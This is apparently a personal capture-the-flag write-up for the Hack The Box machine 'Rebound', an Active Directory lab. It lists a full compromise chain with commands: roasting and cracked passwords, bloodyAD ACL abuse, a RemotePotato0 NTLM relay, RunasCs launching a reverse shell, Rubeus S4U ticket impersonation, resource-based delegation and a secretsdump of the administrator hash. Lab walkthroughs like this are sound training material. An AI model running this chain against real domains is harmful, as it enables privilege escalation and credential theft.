🏀Rebound - HTB

https://app.hackthebox.com/machines/Rebound

FootHold

Enumerating exist users

GetUsersSPNs to grab their ticket with no-preauth user jjones

ldap_monitor user were cracked

ldap_monitor:1GR8t@$$4u

machine give error KRB_AP_ERR_SKEW(Clock skew too great)

after some googling i found this

synchronizing time with the domain time as kerberos is a time sensitive

Creating a TGT

after reviewing bloodhound

1- Add 'oorend' user to ServiceMgmt Group

bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember 'CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"

2- Get FullControl on OU Service Users

bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"

3- Update winrm_svc password

bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Ask1askaskask 
or
rpcclient
setuserinfo2 winrm_svc 23 Ask1askaskask

Root#

first we need user tbrady

exploit RPC -> Ldap

https://github.com/antonioCoco/RemotePotato0

It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.

so this is what to do

1- setup a socat listener

socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999

2- setup a cross protocol relay <ntlmrelayx >se server

python3 ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc

3- execute RemotePotato.exe

.\RemotePotato.exe -m 2 -s 1 -r 10.10.14.15 -x 10.10.14.15 -p 9999

cracked it with hashcat -m 5600

tbrady : 543BOMBOMBUNmanda

we cant get a shell with this user ,but we can still use bloodAD

The user tbrady has the ability to read the GMSA password of the delegator$ GMSA

The delegator GMSA has constrained delegation configured over the DC

hash

aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3

getting a TGT for delegator$

uploading RunasCs.exe

.\RunasCs.exe tbrady 543BOMBOMBUNmanda "cmd.exe /c whoami"

we are able to execute commands as user tbrady ,lets upload reverseshell and give permission to folder

icacls "C:\Users\winrm_svc\Documents" /grant:r "Everyone:(OI)(CI)F" /T

.\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\Users\winrm_svc\Documents\shell.exe"

now from tbrady shell we execute Rubeus to improsenate administrator ticker

.\Rubeus.exe s4u /user:delegator$ /aes256:9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b /domain:rebound.htb /impersonateuser:administrator /nowrap /ptt

ticket not yet imported so we copy the <base64> and insert it in another command to import it

.\Rubeus.exe ptt /ticket:<base64 ticket .........asdgb==>

Administrator TGT imported

can take the decrypted ticket from base64 and convert it to be imported locally

found out that /etc/hosts must be

10.10.11.231 dc01.rebound.htb dc01

configuring Kerberos ticket delegation from the 'ldap_monitor' service principal to the 'delegator$' service principal using LDAPS

python3 rbcd.py -aesKey 9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -debug -action write -delegate-from ldap_monitor

get ldap_monitor TGT

now impresonate dc01$

python3 getST.pu -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass

export the new administrator TGT

python3 secretsdump.py -no -k dc01.rebound.htb -just-dc-user administrator